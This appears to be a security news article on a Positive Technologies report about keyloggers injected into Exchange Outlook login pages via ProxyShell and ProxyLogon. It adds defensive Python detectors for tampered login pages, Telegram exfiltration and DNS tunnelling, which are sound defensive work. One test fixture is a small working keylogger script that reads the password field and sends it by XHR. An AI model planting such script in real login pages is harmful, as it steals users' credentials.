
Unidentified threat actors have been observed targeting publicly exposed Microsoft Exchange servers and injecting malicious code into their login pages to harvest credentials.
In a new analysis released last week, Positive Technologies said it identified two kinds of keylogger code written in JavaScript on the Outlook login page: those that store the collected data in a local file accessible from the Internet, and those that immediately send the collected data to an external server.

The Russian cybersecurity vendor said this is a continuation of a campaign first documented in May 2024 as targeting entities in Africa and the Middle East. At the time, the company said it had found more than 30 victims across government agencies, banks, IT companies and educational institutions, with evidence of the first compromise dating back to 2021.
The attack chain involves exploiting known flaws in Microsoft Exchange Server (such as ProxyShell) to insert the keylogger code into the login page. It is currently not known who is behind these attacks.
Some of the weaponized vulnerabilities are listed below:
CVE-2014-4078 - IIS Security Feature Bypass Vulnerability
CVE-2020-0796 - Windows SMBv3 Client/Server Remote Code Execution Vulnerability
CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 - Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)
CVE-2021-31206 - Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523 - Microsoft Exchange Server Security Feature Bypass Vulnerability (ProxyShell)
“The malicious JavaScript code reads and processes data from the authentication form and sends it to a specific page on the compromised Exchange server via an XHR request.”

“The source code for the target page contains handler functions that read incoming requests and write data to a file on the server.”
The files containing the stolen data can then be accessed from external networks. Select variants with local keylogging have also been found to collect user cookies, User-Agent strings and timestamps.
One advantage of this approach is that it is less likely to be detected, as there is no outbound traffic carrying the stolen information.
The second variant detected by Positive Technologies, on the other hand, sends the stolen data to Telegram bots via XHR GET requests, with the bot credentials stored in the ApiKey and AuthToken headers, respectively.
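The local-file variant leaves no outbound traffic, so the place to catch it is the login page itself: compare each authentication page against a known-good hash and inspect inline scripts for the combination the report describes (reading the password field, then sending it somewhere with XHR). The following is an added example written for this article, not code from Positive Technologies or Microsoft; the pattern names, the field ids, the `/auth/...` paths and the page fixtures are all constructed for the demonstration.

```python
from __future__ import annotations

import hashlib
import re
from pathlib import Path

# Heuristics for this example: an inline script on an authentication page that reads
# the password field AND ships data off with XMLHttpRequest/fetch (or straight to
# Telegram) is the shape of the keyloggers described above. Names are assumptions.
SUSPICIOUS_PATTERNS = {
    "reads_password_field": re.compile(
        r"""(getElementById|querySelector)\(\s*['"][^'"]*(passw|pwd)[^'"]*['"]""", re.I),
    "xhr_or_fetch": re.compile(r"\b(XMLHttpRequest|fetch)\s*\(", re.I),
    "form_submit_hook": re.compile(r"""addEventListener\(\s*['"]submit['"]""", re.I),
    "telegram_api": re.compile(r"api\.telegram\.org", re.I),
    "cookie_or_user_agent": re.compile(r"document\.cookie|navigator\.userAgent", re.I),
}


def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8", "surrogateescape")).hexdigest()


def inline_scripts(html: str) -> list[str]:
    """Bodies of inline <script> blocks; external scripts (src=...) need a separate review."""
    bodies = []
    for m in re.finditer(r"<script\b([^>]*)>(.*?)</script>", html, re.I | re.S):
        if re.search(r"\bsrc\s*=", m.group(1), re.I):
            continue
        bodies.append(m.group(2))
    return bodies


def scan_page(html: str, baseline_sha256: str | None = None) -> dict:
    """Compare the page against a known-good hash and flag credential-stealing inline scripts."""
    findings = {"hash_mismatch": None, "suspicious_scripts": []}
    if baseline_sha256 is not None:
        findings["hash_mismatch"] = sha256_text(html) != baseline_sha256
    for index, body in enumerate(inline_scripts(html)):
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(body)]
        # Credential theft needs both halves: read the form, then send it somewhere.
        if "reads_password_field" in hits and ("xhr_or_fetch" in hits or "telegram_api" in hits):
            findings["suspicious_scripts"].append({"index": index, "indicators": hits})
    return findings


def scan_directory(root: Path, baselines: dict[str, str]) -> dict[str, dict]:
    """Walk an auth directory (e.g. the OWA auth folder) and scan every .aspx page."""
    results = {}
    for path in root.rglob("*.aspx"):
        rel = path.relative_to(root).as_posix()
        html = path.read_text(encoding="utf-8", errors="surrogateescape")
        results[rel] = scan_page(html, baselines.get(rel))
    return results


# Constructed fixtures standing in for a logon page; field ids and paths are invented.
CLEAN_PAGE = """<html><body>
<form id="logonForm" method="post" action="/auth.owa">
  <input id="username" name="username"><input id="passwordText" name="password" type="password">
</form>
<script src="/auth/logon.js"></script>
<script>document.getElementById('username').focus();</script>
</body></html>"""

# Same page with a constructed injected script of the kind the report describes.
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """<script>
document.getElementById('logonForm').addEventListener('submit', function () {
  var p = document.getElementById('passwordText').value;
  var x = new XMLHttpRequest();
  x.open('GET', '/auth/collect?d=' + encodeURIComponent(p), true);
  x.send();
});
</script></body>""")

if __name__ == "__main__":
    baseline = sha256_text(CLEAN_PAGE)
    print("clean   :", scan_page(CLEAN_PAGE, baseline))
    print("injected:", scan_page(INJECTED_PAGE, baseline))
```

In practice the baseline hashes come from a freshly patched install or from the Exchange media, and `scan_directory` is pointed at the OWA and ECP auth folders on a schedule; a hash mismatch without a corresponding update is itself worth investigating, even when no pattern fires.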

An alternative method uses a Domain Name System (DNS) tunnel in combination with HTTPS POST requests to send out the user credentials and get past the organization’s defenses.
Of the compromised servers discovered, 22 belong to government organizations, followed by infections at IT, industrial and logistics companies. Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands and Turkey are among the top 10 targets.
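Both exfiltrating variants do leave traffic behind, on the victim's browser side: requests to the Telegram Bot API carrying the ApiKey/AuthToken headers, and, for the DNS-tunnel variant, bursts of long high-entropy subdomains under one parent domain. The following is an added example written for this article (not code from the report or from any vendor) that runs two such checks over constructed proxy and resolver records; the thresholds, the `example-tunnel.test` domain and the sample records are all invented for the demonstration.

```python
from __future__ import annotations

import math
import re
from collections import defaultdict

# Constructed resolver records (client, query name). The tunnel labels are 32-hex-char
# rotations of one string so that each has maximal 4-bit entropy; the domain is invented.
BASE_LABEL = "0f1e2d3c4b5a69788796a5b4c3d2e1f0"
DNS_QUERIES = [
    ("10.0.0.5", "www.microsoft.com"),
    ("10.0.0.5", "outlook.office365.com"),
    ("10.0.0.9", "mail.example.test"),
] + [
    ("10.0.0.7", f"{BASE_LABEL[i:] + BASE_LABEL[:i]}.c4d1.example-tunnel.test") for i in range(4)
]

# Constructed web-proxy records (client, method, url, request headers).
PROXY_RECORDS = [
    ("10.0.0.5", "GET", "https://outlook.office365.com/owa/", {}),
    ("10.0.0.7", "GET", "https://api.telegram.org/botTOKEN_PLACEHOLDER/sendMessage",
     {"ApiKey": "placeholder", "AuthToken": "placeholder"}),
]

TELEGRAM_API = re.compile(r"^https?://api\.telegram\.org/", re.I)
CRED_HEADERS = {"apikey", "authtoken"}  # header names named in the report, lower-cased


def shannon_entropy(s: str) -> float:
    """Bits per character; hex-encoded or base32 payloads score far above real hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_domain(qname: str, levels: int = 2) -> str:
    return ".".join(qname.rstrip(".").split(".")[-levels:])


def dns_tunnel_suspects(queries, min_label_len=24, min_entropy=3.5, min_unique=3):
    """(client, parent domain) pairs that issued several distinct long, high-entropy first labels."""
    seen: dict[tuple[str, str], set[str]] = defaultdict(set)
    for client, qname in queries:
        labels = qname.rstrip(".").split(".")
        subdomain_labels = labels[:-2]
        if not subdomain_labels:
            continue
        first = subdomain_labels[0]
        if len(first) >= min_label_len and shannon_entropy(first) >= min_entropy:
            seen[(client, parent_domain(qname))].add(first)
    return {key: len(labels) for key, labels in seen.items() if len(labels) >= min_unique}


def telegram_exfil_suspects(records):
    """Proxy records bound for the Telegram Bot API, noting which credential headers they carry."""
    hits = []
    for client, method, url, headers in records:
        if TELEGRAM_API.match(url):
            present = {name.lower() for name in headers} & CRED_HEADERS
            hits.append({"client": client, "method": method, "cred_headers": sorted(present)})
    return hits


if __name__ == "__main__":
    print("DNS tunnel suspects :", dns_tunnel_suspects(DNS_QUERIES))
    print("Telegram API callers:", telegram_exfil_suspects(PROXY_RECORDS))
```

A hit on either check from a workstation that has just loaded the Exchange login page is a strong signal to pull that page from the server and compare it against a known-good copy; the Telegram check in particular is cheap to run continuously, because ordinary mail clients have no reason to call that API.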
“Numerous Microsoft Exchange servers accessible from the Internet remain vulnerable to older vulnerabilities,” the researchers said. “By embedding malicious code into legitimate authentication pages, attackers can capture user credentials in plain text while remaining undetected for a long period of time.”